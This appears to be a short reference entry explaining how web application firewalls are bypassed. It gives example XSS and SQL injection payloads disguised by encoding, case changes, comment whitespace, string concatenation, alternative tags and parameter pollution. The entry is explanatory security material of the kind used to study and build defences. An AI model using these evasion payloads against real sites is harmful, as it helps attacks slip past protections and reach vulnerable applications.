WAF Bypass

WAF Bypass refers to techniques that evade Web Application Firewall detection, allowing attack payloads to reach the vulnerable application. Bypasses exploit limitations in signature-based detection and parsing differences.

Common Bypass Techniques

Encoding

# URL encoding
<script> → %3Cscript%3E

# Double URL encoding
< → %253C

# Unicode encoding
< → \u003c

# HTML entities
<script> → &lt;script&gt;

Case Manipulation

<ScRiPt>
SeLeCt * FrOm users

Whitespace Alternatives

# Tabs, newlines, comments
SELECT/**/password/**/FROM/**/users
SELECT%09password%09FROM%09users
<script%0d%0a>alert(1)</script>

String Concatenation

# SQL
SEL' + 'ECT * FROM users
CONCAT('SEL','ECT')

# JavaScript
eval('al'+'ert(1)')

Alternative Syntax

# XSS alternatives
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

# SQL alternatives
1 UNION ALL SELECT
1 /*!UNION*/ SELECT

HTTP Parameter Pollution

# Send same parameter twice
?id=1&id=2 UNION SELECT

# Different servers handle this differently

Detection Gaps

• JSON/XML payloads may not be inspected
• Multipart form data parsing differences
• Chunked transfer encoding
• Protocol-level tricks

See Also

• Web Application Firewall
• Double Encoding
• Unicode Normalization Bypass